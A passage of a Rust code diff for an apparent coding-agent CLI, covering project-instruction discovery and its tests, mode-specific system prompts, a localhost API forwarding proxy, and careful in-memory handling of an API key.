assert!(!ctx.has_instructions());
|
||||
assert!(ctx.source_path.is_none());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_load_project_context_agents_md() {
|
||||
let tmp = tempdir().expect("tempdir");
|
||||
let agents_path = tmp.path().join("AGENTS.md");
|
||||
fs::write(&agents_path, "# Test Instructions\n\nFollow these rules.").expect("write");
|
||||
|
||||
let ctx = load_project_context(tmp.path());
|
||||
|
||||
assert!(ctx.has_instructions());
|
||||
assert!(
|
||||
ctx.instructions
|
||||
.as_ref()
|
||||
.unwrap()
|
||||
.contains("Test Instructions")
|
||||
);
|
||||
assert_eq!(ctx.source_path, Some(agents_path));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_load_project_context_priority() {
|
||||
let tmp = tempdir().expect("tempdir");
|
||||
|
||||
// Create both files - AGENTS.md should take priority
|
||||
fs::write(tmp.path().join("AGENTS.md"), "AGENTS content").expect("write");
|
||||
let claude_dir = tmp.path().join(".claude");
|
||||
fs::create_dir(&claude_dir).expect("mkdir");
|
||||
fs::write(claude_dir.join("instructions.md"), "CLAUDE content").expect("write");
|
||||
|
||||
let ctx = load_project_context(tmp.path());
|
||||
|
||||
assert!(ctx.has_instructions());
|
||||
assert!(
|
||||
ctx.instructions
|
||||
.as_ref()
|
||||
.unwrap()
|
||||
.contains("AGENTS content")
|
||||
);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_load_project_context_hidden_dir() {
|
||||
let tmp = tempdir().expect("tempdir");
|
||||
let hidden_dir = tmp.path().join(".deepseek");
|
||||
fs::create_dir(&hidden_dir).expect("mkdir");
|
||||
fs::write(hidden_dir.join("instructions.md"), "Hidden instructions").expect("write");
|
||||
|
||||
let ctx = load_project_context(tmp.path());
|
||||
|
||||
assert!(ctx.has_instructions());
|
||||
assert!(
|
||||
ctx.instructions
|
||||
.as_ref()
|
||||
.unwrap()
|
||||
.contains("Hidden instructions")
|
||||
);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_as_system_block() {
|
||||
let tmp = tempdir().expect("tempdir");
|
||||
let agents_path = tmp.path().join("AGENTS.md");
|
||||
fs::write(&agents_path, "Test content").expect("write");
|
||||
|
||||
let ctx = load_project_context(tmp.path());
|
||||
let block = ctx.as_system_block().expect("block");
|
||||
|
||||
assert!(block.contains("<project_instructions"));
|
||||
assert!(block.contains("Test content"));
|
||||
assert!(block.contains("</project_instructions>"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_empty_file_warning() {
|
||||
let tmp = tempdir().expect("tempdir");
|
||||
let agents_path = tmp.path().join("AGENTS.md");
|
||||
fs::write(&agents_path, " \n \n ").expect("write"); // Only whitespace
|
||||
|
||||
let ctx = load_project_context(tmp.path());
|
||||
|
||||
assert!(!ctx.has_instructions());
|
||||
assert!(!ctx.warnings.is_empty());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_check_trust_status() {
|
||||
let tmp = tempdir().expect("tempdir");
|
||||
|
||||
// Not trusted by default
|
||||
assert!(!check_trust_status(tmp.path()));
|
||||
|
||||
// Create trust marker
|
||||
let deepseek_dir = tmp.path().join(".deepseek");
|
||||
fs::create_dir(&deepseek_dir).expect("mkdir");
|
||||
fs::write(deepseek_dir.join("trusted"), "").expect("write");
|
||||
|
||||
assert!(check_trust_status(tmp.path()));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_create_default_agents_md() {
|
||||
let tmp = tempdir().expect("tempdir");
|
||||
let path = create_default_agents_md(tmp.path()).expect("create");
|
||||
|
||||
assert!(path.exists());
|
||||
let content = fs::read_to_string(&path).expect("read");
|
||||
assert!(content.contains("Project Agent Instructions"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_load_with_parents() {
|
||||
let tmp = tempdir().expect("tempdir");
|
||||
|
||||
// Create a nested structure
|
||||
let subdir = tmp.path().join("subproject");
|
||||
fs::create_dir(&subdir).expect("mkdir");
|
||||
|
||||
// Put AGENTS.md in parent
|
||||
fs::write(tmp.path().join("AGENTS.md"), "Parent instructions").expect("write");
|
||||
// Also create .git to mark as repo root
|
||||
fs::create_dir(tmp.path().join(".git")).expect("mkdir .git");
|
||||
|
||||
// Load from subdir should find parent's AGENTS.md
|
||||
let ctx = load_project_context_with_parents(&subdir);
|
||||
|
||||
assert!(ctx.has_instructions());
|
||||
assert!(
|
||||
ctx.instructions
|
||||
.as_ref()
|
||||
.unwrap()
|
||||
.contains("Parent instructions")
|
||||
);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_merge_contexts() {
|
||||
let mut ctx1 = ProjectContext::empty(PathBuf::from("/a"));
|
||||
ctx1.instructions = Some("Instructions A".to_string());
|
||||
ctx1.source_path = Some(PathBuf::from("/a/AGENTS.md"));
|
||||
|
||||
let mut ctx2 = ProjectContext::empty(PathBuf::from("/b"));
|
||||
ctx2.instructions = Some("Instructions B".to_string());
|
||||
ctx2.source_path = Some(PathBuf::from("/b/AGENTS.md"));
|
||||
|
||||
let merged = merge_contexts(&[ctx1, ctx2]).expect("merge");
|
||||
|
||||
assert!(merged.contains("Instructions A"));
|
||||
assert!(merged.contains("Instructions B"));
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,143 @@
|
||||
//! Project document discovery and loading
|
||||
//!
|
||||
//! Supports auto-discovery of project instructions like Claude Code.
|
||||
//! Priority: AGENTS.md > .claude/instructions.md > CLAUDE.md > .deepseek/instructions.md
|
||||
|
||||
#![allow(dead_code)]
|
||||
|
||||
use std::path::{Path, PathBuf};
|
||||
|
||||
/// Document filenames to search for (in priority order)
|
||||
pub const DOC_FILENAMES: &[&str] = &[
|
||||
"AGENTS.md",
|
||||
".claude/instructions.md",
|
||||
"CLAUDE.md",
|
||||
".deepseek/instructions.md",
|
||||
];
|
||||
|
||||
/// Maximum bytes to read from project docs (default: 32KB)
|
||||
pub const DEFAULT_MAX_BYTES: usize = 32768;
|
||||
|
||||
/// A discovered project document
|
||||
#[derive(Debug, Clone)]
|
||||
#[allow(dead_code)]
|
||||
pub struct ProjectDoc {
|
||||
pub path: PathBuf,
|
||||
pub content: String,
|
||||
}
|
||||
|
||||
/// Walk from cwd up to git root, collecting all project docs
|
||||
pub fn discover_paths(cwd: &Path) -> Vec<PathBuf> {
|
||||
let mut paths = Vec::new();
|
||||
let git_root = find_git_root(cwd);
|
||||
|
||||
let mut current = cwd.to_path_buf();
|
||||
loop {
|
||||
for filename in DOC_FILENAMES {
|
||||
let doc_path = current.join(filename);
|
||||
if doc_path.exists() && doc_path.is_file() {
|
||||
paths.push(doc_path);
|
||||
}
|
||||
}
|
||||
|
||||
// Stop at git root or filesystem root
|
||||
if let Some(ref root) = git_root
|
||||
&& current == *root
|
||||
{
|
||||
break;
|
||||
}
|
||||
|
||||
match current.parent() {
|
||||
Some(parent) if parent != current => {
|
||||
current = parent.to_path_buf();
|
||||
}
|
||||
_ => break,
|
||||
}
|
||||
}
|
||||
|
||||
// Reverse so parent docs come first (will be overridden by child docs)
|
||||
paths.reverse();
|
||||
paths
|
||||
}
|
||||
|
||||
/// Find the git root directory from cwd
|
||||
fn find_git_root(cwd: &Path) -> Option<PathBuf> {
|
||||
let mut current = cwd.to_path_buf();
|
||||
loop {
|
||||
if current.join(".git").exists() {
|
||||
return Some(current);
|
||||
}
|
||||
match current.parent() {
|
||||
Some(parent) if parent != current => {
|
||||
current = parent.to_path_buf();
|
||||
}
|
||||
_ => return None,
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// Read and concatenate project docs with byte limit
|
||||
pub fn read_project_docs(paths: &[PathBuf], max_bytes: usize) -> Option<String> {
|
||||
if paths.is_empty() {
|
||||
return None;
|
||||
}
|
||||
|
||||
let mut combined = String::new();
|
||||
let mut total_bytes = 0;
|
||||
|
||||
for path in paths {
|
||||
if total_bytes >= max_bytes {
|
||||
break;
|
||||
}
|
||||
|
||||
if let Ok(content) = std::fs::read_to_string(path) {
|
||||
let remaining = max_bytes.saturating_sub(total_bytes);
|
||||
let content = if content.len() > remaining {
|
||||
// Truncate to remaining bytes at a word boundary if possible
|
||||
let truncated: String = content.chars().take(remaining).collect();
|
||||
format!("{truncated}\n\n[...truncated...]")
|
||||
} else {
|
||||
content
|
||||
};
|
||||
|
||||
if !combined.is_empty() {
|
||||
combined.push_str("\n\n---\n\n");
|
||||
}
|
||||
combined.push_str(&format_instructions(path, &content));
|
||||
total_bytes += content.len();
|
||||
}
|
||||
}
|
||||
|
||||
if combined.is_empty() {
|
||||
None
|
||||
} else {
|
||||
Some(combined)
|
||||
}
|
||||
}
|
||||
|
||||
/// Format project instructions for injection into system prompt
|
||||
pub fn format_instructions(path: &Path, content: &str) -> String {
|
||||
format!(
|
||||
"# Project instructions from {}\n\n<INSTRUCTIONS>\n{}\n</INSTRUCTIONS>",
|
||||
path.display(),
|
||||
content.trim()
|
||||
)
|
||||
}
|
||||
|
||||
/// Load project docs from workspace with default settings
|
||||
pub fn load_from_workspace(workspace: &Path) -> Option<String> {
|
||||
let paths = discover_paths(workspace);
|
||||
read_project_docs(&paths, DEFAULT_MAX_BYTES)
|
||||
}
|
||||
|
||||
/// Check if workspace has any project doc
|
||||
#[allow(dead_code)]
|
||||
pub fn has_project_doc(workspace: &Path) -> bool {
|
||||
!discover_paths(workspace).is_empty()
|
||||
}
|
||||
|
||||
/// Get the primary project doc path (for display)
|
||||
#[allow(dead_code)]
|
||||
pub fn primary_doc_path(workspace: &Path) -> Option<PathBuf> {
|
||||
discover_paths(workspace).into_iter().next()
|
||||
}
|
||||
@@ -0,0 +1,94 @@
|
||||
//! System prompts for different modes.
|
||||
//! NOTE: Prompt building is currently handled directly in engine - these are for future refactoring.
|
||||
|
||||
#![allow(dead_code)]
|
||||
|
||||
use crate::models::SystemPrompt;
|
||||
use crate::project_context::{ProjectContext, load_project_context_with_parents};
|
||||
use crate::tui::app::AppMode;
|
||||
use std::path::Path;
|
||||
|
||||
// Prompt files loaded at compile time
|
||||
pub const BASE_PROMPT: &str = include_str!("prompts/base.txt");
|
||||
pub const NORMAL_PROMPT: &str = include_str!("prompts/normal.txt");
|
||||
pub const AGENT_PROMPT: &str = include_str!("prompts/agent.txt");
|
||||
pub const PLAN_PROMPT: &str = include_str!("prompts/plan.txt");
|
||||
pub const RLM_PROMPT: &str = include_str!("prompts/rlm.txt");
|
||||
pub const DUO_PROMPT: &str = include_str!("prompts/duo.txt");
|
||||
|
||||
/// Get the system prompt for a specific mode
|
||||
pub fn system_prompt_for_mode(mode: AppMode) -> SystemPrompt {
|
||||
let text = match mode {
|
||||
AppMode::Normal => NORMAL_PROMPT,
|
||||
AppMode::Agent | AppMode::Yolo => AGENT_PROMPT,
|
||||
AppMode::Plan => PLAN_PROMPT,
|
||||
AppMode::Rlm => RLM_PROMPT,
|
||||
AppMode::Duo => DUO_PROMPT,
|
||||
};
|
||||
SystemPrompt::Text(text.trim().to_string())
|
||||
}
|
||||
|
||||
/// Get the system prompt for a specific mode with project context
|
||||
pub fn system_prompt_for_mode_with_context(
|
||||
mode: AppMode,
|
||||
workspace: &Path,
|
||||
rlm_summary: Option<&str>,
|
||||
duo_summary: Option<&str>,
|
||||
) -> SystemPrompt {
|
||||
let base_prompt = match mode {
|
||||
AppMode::Normal => NORMAL_PROMPT,
|
||||
AppMode::Agent | AppMode::Yolo => AGENT_PROMPT,
|
||||
AppMode::Plan => PLAN_PROMPT,
|
||||
AppMode::Rlm => RLM_PROMPT,
|
||||
AppMode::Duo => DUO_PROMPT,
|
||||
};
|
||||
|
||||
// Load project context from workspace
|
||||
let project_context = load_project_context_with_parents(workspace);
|
||||
|
||||
// Combine base prompt with project context
|
||||
let mut full_prompt = if let Some(project_block) = project_context.as_system_block() {
|
||||
format!("{}\n\n{}", base_prompt.trim(), project_block)
|
||||
} else {
|
||||
base_prompt.trim().to_string()
|
||||
};
|
||||
|
||||
if mode == AppMode::Rlm {
|
||||
let summary = rlm_summary.unwrap_or("No RLM contexts loaded.");
|
||||
full_prompt = format!("{full_prompt}\n\nRLM Context Summary:\n{summary}");
|
||||
}
|
||||
|
||||
if mode == AppMode::Duo {
|
||||
let summary = duo_summary.unwrap_or("No Duo contexts loaded.");
|
||||
full_prompt = format!("{full_prompt}\n\nDuo Context Summary:\n{summary}");
|
||||
}
|
||||
|
||||
SystemPrompt::Text(full_prompt)
|
||||
}
|
||||
|
||||
/// Build a system prompt with explicit project context
|
||||
pub fn build_system_prompt(base: &str, project_context: Option<&ProjectContext>) -> SystemPrompt {
|
||||
let full_prompt =
|
||||
match project_context.and_then(super::project_context::ProjectContext::as_system_block) {
|
||||
Some(project_block) => format!("{}\n\n{}", base.trim(), project_block),
|
||||
None => base.trim().to_string(),
|
||||
};
|
||||
SystemPrompt::Text(full_prompt)
|
||||
}
|
||||
|
||||
// Legacy functions for backwards compatibility
|
||||
pub fn base_system_prompt() -> SystemPrompt {
|
||||
SystemPrompt::Text(BASE_PROMPT.trim().to_string())
|
||||
}
|
||||
|
||||
pub fn normal_system_prompt() -> SystemPrompt {
|
||||
SystemPrompt::Text(NORMAL_PROMPT.trim().to_string())
|
||||
}
|
||||
|
||||
pub fn agent_system_prompt() -> SystemPrompt {
|
||||
SystemPrompt::Text(AGENT_PROMPT.trim().to_string())
|
||||
}
|
||||
|
||||
pub fn plan_system_prompt() -> SystemPrompt {
|
||||
SystemPrompt::Text(PLAN_PROMPT.trim().to_string())
|
||||
}
|
||||
@@ -0,0 +1,48 @@
|
||||
You are DeepSeek CLI, an agentic coding assistant with full tool access.
|
||||
|
||||
IMPORTANT: You are ALREADY running inside the DeepSeek CLI TUI. You have direct access to all tools below - do NOT try to run or launch the CLI binary. Your tools execute directly in the current session.
|
||||
|
||||
When given a task:
|
||||
1. Break it into subtasks and track them with todo tools.
|
||||
2. Work through each subtask systematically.
|
||||
3. Report progress as you go.
|
||||
4. Verify your work before marking complete.
|
||||
5. Do not stop until the full task is done.
|
||||
6. Avoid destructive actions (deletes, irreversible changes) unless the user explicitly requests them; suggest YOLO for high-risk changes.
|
||||
|
||||
Available tools:
|
||||
|
||||
FILE OPERATIONS:
|
||||
- list_dir: List directory contents
|
||||
- read_file: Read file contents
|
||||
- write_file: Create or overwrite a file
|
||||
- edit_file: Search and replace text in a file
|
||||
- apply_patch: Apply a unified diff patch to a file
|
||||
- grep_files: Search files by regex
|
||||
- web_search: Search the web for up-to-date information
|
||||
|
||||
SHELL EXECUTION:
|
||||
- exec_shell: Run shell commands (supports background execution)
|
||||
- command: The command to execute
|
||||
- timeout_ms: Timeout in milliseconds (default: 120000, max: 600000)
|
||||
- background: Set true to run in background, returns task_id
|
||||
|
||||
TASK MANAGEMENT:
|
||||
- todo_write: Write or update the todo list
|
||||
- update_plan: Publish a structured checklist for complex work
|
||||
- note: Record important information
|
||||
|
||||
SUB-AGENTS:
|
||||
- agent_spawn: Spawn a background sub-agent (type, prompt, allowed_tools)
|
||||
- agent_result: Get result from a sub-agent (agent_id, block, timeout_ms)
|
||||
- agent_cancel: Cancel a running sub-agent (agent_id)
|
||||
- agent_list: List all sub-agents and their status
|
||||
If you spawn a sub-agent, always follow up with agent_result (block: true) and incorporate its result before responding to the user.
|
||||
|
||||
For complex work, call update_plan to publish a checklist.
|
||||
Keep exactly one plan step in_progress at a time.
|
||||
Use todo tools for granular progress when helpful.
|
||||
|
||||
BACKGROUND EXECUTION:
|
||||
For long-running commands (build, test, server), use exec_shell with background: true.
|
||||
This returns a task_id immediately in the tool output.
|
||||
@@ -0,0 +1,14 @@
|
||||
You are DeepSeek CLI, an agentic coding assistant.
|
||||
|
||||
When given a task:
|
||||
1. Break it into subtasks and track them.
|
||||
2. Work through each subtask systematically.
|
||||
3. Report progress as you go.
|
||||
4. Verify your work before marking complete.
|
||||
5. Do not stop until the full task is done.
|
||||
|
||||
Use tools when needed. For complex work, call update_plan to publish a checklist.
|
||||
Keep exactly one plan step in_progress at a time.
|
||||
Use todo tools for granular progress when helpful.
|
||||
|
||||
Tone: competent, warm, and concise. Use light humor sparingly when it fits; a rare example is "You're absolutely right! ... maybe."
|
||||
@@ -0,0 +1,3 @@
|
||||
You are in Duo mode for requirements-driven development.
|
||||
|
||||
Use duo_init with a requirements checklist, then alternate duo_player (implement) and duo_coach (verify) until approved.
|
||||
@@ -0,0 +1,25 @@
|
||||
You are DeepSeek CLI, a helpful coding assistant running in NORMAL mode.
|
||||
|
||||
IMPORTANT: You are ALREADY running inside the DeepSeek CLI TUI. You have direct access to all tools below - do NOT try to run or launch the CLI binary.
|
||||
|
||||
You help users with coding questions, explanations, debugging, and general programming assistance.
|
||||
|
||||
Available tools in this mode:
|
||||
- list_dir: Browse directories in the workspace
|
||||
- read_file: Read file contents
|
||||
- write_file: Create or overwrite a file (ask first)
|
||||
- edit_file: Search and replace text in a file (ask first)
|
||||
- apply_patch: Apply a unified diff patch (ask first)
|
||||
- grep_files: Search files by regex
|
||||
- web_search: Search the web for up-to-date information
|
||||
- exec_shell: Run shell commands (ask first, if enabled)
|
||||
- note: Record important information
|
||||
- todo_write: Write or update the todo list
|
||||
- update_plan: Publish a structured plan
|
||||
|
||||
Guidelines:
|
||||
1. Answer questions clearly and concisely
|
||||
2. Provide code examples when helpful
|
||||
3. You CAN read files and explore the codebase
|
||||
4. Ask for explicit approval before any file writes, patches, or shell commands
|
||||
5. If the user wants fully autonomous changes, suggest pressing Tab to switch to Agent or YOLO mode
|
||||
@@ -0,0 +1,31 @@
|
||||
You are DeepSeek CLI in PLAN mode. Design before implementing.
|
||||
|
||||
This mode is read-only: you can analyze and plan, but you cannot edit files or run shell commands.
|
||||
|
||||
In this mode, focus on:
|
||||
1. Understanding requirements fully before proposing solutions
|
||||
2. Breaking down complex tasks into clear, actionable steps
|
||||
3. Identifying potential issues and edge cases upfront
|
||||
4. Creating a detailed plan using update_plan before implementation
|
||||
|
||||
Available tools:
|
||||
|
||||
PLANNING:
|
||||
- update_plan: Publish a structured plan with steps and status
|
||||
- todo_write: Write or update the todo list
|
||||
|
||||
EXPLORATION:
|
||||
- list_dir: Browse directories in the workspace
|
||||
- read_file: Read file contents to understand context
|
||||
- grep_files: Search files by regex
|
||||
- web_search: Search the web for up-to-date information (if enabled)
|
||||
|
||||
Guidelines:
|
||||
- Focus on planning before making changes
|
||||
- Use update_plan to create structured plans
|
||||
- Each step should be specific and actionable
|
||||
- Include acceptance criteria where possible
|
||||
- Identify dependencies between steps
|
||||
- Call out risks, edge cases, and verification steps
|
||||
- Ask clarifying questions if requirements are unclear
|
||||
- After the plan is ready, summarize briefly and wait for user direction
|
||||
@@ -0,0 +1,3 @@
|
||||
You are in RLM mode for working with large files that exceed context limits.
|
||||
|
||||
Use rlm_* tools to load files, explore content, and run focused queries over chunks.
|
||||
@@ -0,0 +1,226 @@
|
||||
use std::fs::{self, File};
|
||||
use std::io::Write;
|
||||
use std::net::{SocketAddr, TcpListener};
|
||||
use std::path::{Path, PathBuf};
|
||||
use std::sync::Arc;
|
||||
use std::time::Duration;
|
||||
|
||||
use anyhow::{Context, Result, anyhow};
|
||||
use clap::Parser;
|
||||
use reqwest::Url;
|
||||
use reqwest::blocking::Client;
|
||||
use reqwest::header::{AUTHORIZATION, HOST, HeaderMap, HeaderName, HeaderValue};
|
||||
use serde::Serialize;
|
||||
use tiny_http::{Header, Method, Request, Response, Server, StatusCode};
|
||||
|
||||
mod read_api_key;
|
||||
use read_api_key::read_auth_header_from_stdin;
|
||||
|
||||
/// CLI arguments for the proxy.
|
||||
#[derive(Debug, Clone, Parser)]
|
||||
#[command(
|
||||
name = "responses-api-proxy",
|
||||
about = "Minimal DeepSeek responses proxy"
|
||||
)]
|
||||
pub struct Args {
|
||||
/// Port to listen on. If not set, an ephemeral port is used.
|
||||
#[arg(long)]
|
||||
pub port: Option<u16>,
|
||||
|
||||
/// Path to a JSON file to write startup info (single line). Includes {"port": <u16>}.
|
||||
#[arg(long, value_name = "FILE")]
|
||||
pub server_info: Option<PathBuf>,
|
||||
|
||||
/// Enable HTTP shutdown endpoint at GET /shutdown
|
||||
#[arg(long)]
|
||||
pub http_shutdown: bool,
|
||||
|
||||
/// Absolute URL the proxy should forward requests to.
|
||||
#[arg(long, default_value = "https://api.deepseek.com/v1/responses")]
|
||||
pub upstream_url: String,
|
||||
}
|
||||
|
||||
#[derive(Serialize)]
|
||||
struct ServerInfo {
|
||||
port: u16,
|
||||
pid: u32,
|
||||
}
|
||||
|
||||
struct ForwardConfig {
|
||||
upstream_url: Url,
|
||||
host_header: HeaderValue,
|
||||
}
|
||||
|
||||
/// Entry point for the proxy server.
|
||||
pub fn run_main(args: Args) -> Result<()> {
|
||||
let auth_header = read_auth_header_from_stdin()?;
|
||||
|
||||
let upstream_url = Url::parse(&args.upstream_url).context("parsing --upstream-url")?;
|
||||
let host = match (upstream_url.host_str(), upstream_url.port()) {
|
||||
(Some(host), Some(port)) => format!("{host}:{port}"),
|
||||
(Some(host), None) => host.to_string(),
|
||||
_ => return Err(anyhow!("upstream URL must include a host")),
|
||||
};
|
||||
let host_header =
|
||||
HeaderValue::from_str(&host).context("constructing Host header from upstream URL")?;
|
||||
|
||||
let forward_config = Arc::new(ForwardConfig {
|
||||
upstream_url,
|
||||
host_header,
|
||||
});
|
||||
|
||||
let (listener, bound_addr) = bind_listener(args.port)?;
|
||||
if let Some(path) = args.server_info.as_ref() {
|
||||
write_server_info(path, bound_addr.port())?;
|
||||
}
|
||||
let server = Server::from_listener(listener, None)
|
||||
.map_err(|err| anyhow!("creating HTTP server: {err}"))?;
|
||||
let client = Arc::new(
|
||||
Client::builder()
|
||||
// Disable reqwest's 30s default so long-lived response streams keep flowing.
|
||||
.timeout(None::<Duration>)
|
||||
.build()
|
||||
.context("building reqwest client")?,
|
||||
);
|
||||
|
||||
eprintln!("responses-api-proxy listening on {bound_addr}");
|
||||
|
||||
let http_shutdown = args.http_shutdown;
|
||||
for request in server.incoming_requests() {
|
||||
let client = client.clone();
|
||||
let forward_config = forward_config.clone();
|
||||
std::thread::spawn(move || {
|
||||
if http_shutdown && request.method() == &Method::Get && request.url() == "/shutdown" {
|
||||
let _ = request.respond(Response::new_empty(StatusCode(200)));
|
||||
std::process::exit(0);
|
||||
}
|
||||
|
||||
if let Err(e) = forward_request(&client, auth_header, &forward_config, request) {
|
||||
eprintln!("forwarding error: {e}");
|
||||
}
|
||||
});
|
||||
}
|
||||
|
||||
Err(anyhow!("server stopped unexpectedly"))
|
||||
}
|
||||
|
||||
fn bind_listener(port: Option<u16>) -> Result<(TcpListener, SocketAddr)> {
|
||||
let addr = SocketAddr::from(([127, 0, 0, 1], port.unwrap_or(0)));
|
||||
let listener = TcpListener::bind(addr).with_context(|| format!("failed to bind {addr}"))?;
|
||||
let bound = listener.local_addr().context("failed to read local_addr")?;
|
||||
Ok((listener, bound))
|
||||
}
|
||||
|
||||
fn write_server_info(path: &Path, port: u16) -> Result<()> {
|
||||
if let Some(parent) = path.parent()
|
||||
&& !parent.as_os_str().is_empty()
|
||||
{
|
||||
fs::create_dir_all(parent)?;
|
||||
}
|
||||
|
||||
let info = ServerInfo {
|
||||
port,
|
||||
pid: std::process::id(),
|
||||
};
|
||||
let mut data = serde_json::to_string(&info)?;
|
||||
data.push('\n');
|
||||
let mut f = File::create(path)?;
|
||||
f.write_all(data.as_bytes())?;
|
||||
Ok(())
|
||||
}
|
||||
|
||||
fn forward_request(
|
||||
client: &Client,
|
||||
auth_header: &'static str,
|
||||
config: &ForwardConfig,
|
||||
mut req: Request,
|
||||
) -> Result<()> {
|
||||
// Only allow POST /v1/responses exactly, no query string.
|
||||
let method = req.method().clone();
|
||||
let url_path = req.url().to_string();
|
||||
let allow = method == Method::Post && url_path == "/v1/responses";
|
||||
|
||||
if !allow {
|
||||
let resp = Response::new_empty(StatusCode(403));
|
||||
let _ = req.respond(resp);
|
||||
return Ok(());
|
||||
}
|
||||
|
||||
// Read request body
|
||||
let mut body = Vec::new();
|
||||
let mut reader = req.as_reader();
|
||||
std::io::Read::read_to_end(&mut reader, &mut body)?;
|
||||
|
||||
// Build headers for upstream, forwarding everything from the incoming
|
||||
// request except Authorization (we replace it below).
|
||||
let mut headers = HeaderMap::new();
|
||||
for header in req.headers() {
|
||||
let name_ascii = header.field.as_str();
|
||||
let lower = name_ascii.to_ascii_lowercase();
|
||||
if lower.as_str() == "authorization" || lower.as_str() == "host" {
|
||||
continue;
|
||||
}
|
||||
|
||||
let header_name = match HeaderName::from_bytes(lower.as_bytes()) {
|
||||
Ok(name) => name,
|
||||
Err(_) => continue,
|
||||
};
|
||||
if let Ok(value) = HeaderValue::from_bytes(header.value.as_bytes()) {
|
||||
headers.append(header_name, value);
|
||||
}
|
||||
}
|
||||
|
||||
// As part of our effort to keep `auth_header` secret, we use a
|
||||
// combination of `from_static()` and `set_sensitive(true)`.
|
||||
let mut auth_header_value = HeaderValue::from_static(auth_header);
|
||||
auth_header_value.set_sensitive(true);
|
||||
headers.insert(AUTHORIZATION, auth_header_value);
|
||||
|
||||
headers.insert(HOST, config.host_header.clone());
|
||||
|
||||
let upstream_resp = client
|
||||
.post(config.upstream_url.clone())
|
||||
.headers(headers)
|
||||
.body(body)
|
||||
.send()
|
||||
.context("forwarding request to upstream")?;
|
||||
|
||||
// We have to create an adapter between a `reqwest::blocking::Response`
|
||||
// and a `tiny_http::Response`. Fortunately, `reqwest::blocking::Response`
|
||||
// implements `Read`, so we can use it directly as the body of the
|
||||
// `tiny_http::Response`.
|
||||
let status = upstream_resp.status();
|
||||
let mut response_headers = Vec::new();
|
||||
for (name, value) in upstream_resp.headers().iter() {
|
||||
// Skip headers that tiny_http manages itself.
|
||||
if matches!(
|
||||
name.as_str(),
|
||||
"content-length" | "transfer-encoding" | "connection" | "trailer" | "upgrade"
|
||||
) {
|
||||
continue;
|
||||
}
|
||||
|
||||
if let Ok(header) = Header::from_bytes(name.as_str().as_bytes(), value.as_bytes()) {
|
||||
response_headers.push(header);
|
||||
}
|
||||
}
|
||||
|
||||
let content_length = upstream_resp.content_length().and_then(|len| {
|
||||
if len <= usize::MAX as u64 {
|
||||
Some(len as usize)
|
||||
} else {
|
||||
None
|
||||
}
|
||||
});
|
||||
|
||||
let response = Response::new(
|
||||
StatusCode(status.as_u16()),
|
||||
response_headers,
|
||||
upstream_resp,
|
||||
content_length,
|
||||
None,
|
||||
);
|
||||
|
||||
let _ = req.respond(response);
|
||||
Ok(())
|
||||
}
|
||||
@@ -0,0 +1,217 @@
|
||||
use anyhow::{Context, Result, anyhow};
|
||||
use zeroize::Zeroize;
|
||||
|
||||
/// Use a generous buffer size to avoid truncation and to allow for longer API
|
||||
/// keys in the future.
|
||||
const BUFFER_SIZE: usize = 1024;
|
||||
const AUTH_HEADER_PREFIX: &[u8] = b"Bearer ";
|
||||
|
||||
/// Reads the auth token from stdin and returns a static `Authorization` header
|
||||
/// value with the auth token used with `Bearer`. The header value is returned
|
||||
/// as a `&'static str` whose bytes are locked in memory to avoid accidental
|
||||
/// exposure.
|
||||
#[cfg(unix)]
|
||||
pub(crate) fn read_auth_header_from_stdin() -> Result<&'static str> {
|
||||
read_auth_header_with(read_from_unix_stdin)
|
||||
}
|
||||
|
||||
#[cfg(windows)]
|
||||
pub(crate) fn read_auth_header_from_stdin() -> Result<&'static str> {
|
||||
use std::io::Read;
|
||||
|
||||
// Use of `stdio::io::stdin()` has the problem mentioned in the docstring on
|
||||
// the UNIX version of `read_from_unix_stdin()`, so this should ultimately
|
||||
// be replaced the low-level Windows equivalent. Because we do not have an
|
||||
// equivalent of mlock() on Windows right now, it is not pressing until we
|
||||
// address that issue.
|
||||
read_auth_header_with(|buffer| std::io::stdin().read(buffer))
|
||||
}
|
||||
|
||||
/// We perform a low-level read with `read(2)` because `stdio::io::stdin()` has
|
||||
/// an internal BufReader:
|
||||
///
|
||||
/// https://github.com/rust-lang/rust/blob/bcbbdcb8522fd3cb4a8dde62313b251ab107694d/library/std/src/io/stdio.rs#L250-L252
|
||||
///
|
||||
/// that can end up retaining a copy of stdin data in memory with no way to zero
|
||||
/// it out, whereas we aim to guarantee there is exactly one copy of the API key
|
||||
/// in memory, protected by mlock(2).
|
||||
#[cfg(unix)]
|
||||
fn read_from_unix_stdin(buffer: &mut [u8]) -> std::io::Result<usize> {
|
||||
use libc::c_void;
|
||||
use libc::read;
|
||||
|
||||
// Perform a single read(2) call into the provided buffer slice.
|
||||
// Looping and newline/EOF handling are managed by the caller.
|
||||
loop {
|
||||
let result = unsafe {
|
||||
read(
|
||||
libc::STDIN_FILENO,
|
||||
buffer.as_mut_ptr().cast::<c_void>(),
|
||||
buffer.len(),
|
||||
)
|
||||
};
|
||||
|
||||
if result == 0 {
|
||||
return Ok(0);
|
||||
}
|
||||
|
||||
if result < 0 {
|
||||
let err = std::io::Error::last_os_error();
|
||||
if err.kind() == std::io::ErrorKind::Interrupted {
|
||||
continue;
|
||||
}
|
||||
return Err(err);
|
||||
}
|
||||
|
||||
return Ok(result as usize);
|
||||
}
|
||||
}
|
||||
|
||||
fn read_auth_header_with<F>(mut read_fn: F) -> Result<&'static str>
|
||||
where
|
||||
F: FnMut(&mut [u8]) -> std::io::Result<usize>,
|
||||
{
|
||||
// TAKE CARE WHEN MODIFYING THIS CODE!!!
|
||||
//
|
||||
// This function goes to great lengths to avoid leaving the API key in
|
||||
// memory longer than necessary and to avoid copying it around. We read
|
||||
// directly into a stack buffer so the only heap allocation should be the
|
||||
// one to create the String (with the exact size) for the header value,
|
||||
// which we then immediately protect with mlock(2).
|
||||
let mut buf = [0u8; BUFFER_SIZE];
|
||||
buf[..AUTH_HEADER_PREFIX.len()].copy_from_slice(AUTH_HEADER_PREFIX);
|
||||
|
||||
let prefix_len = AUTH_HEADER_PREFIX.len();
|
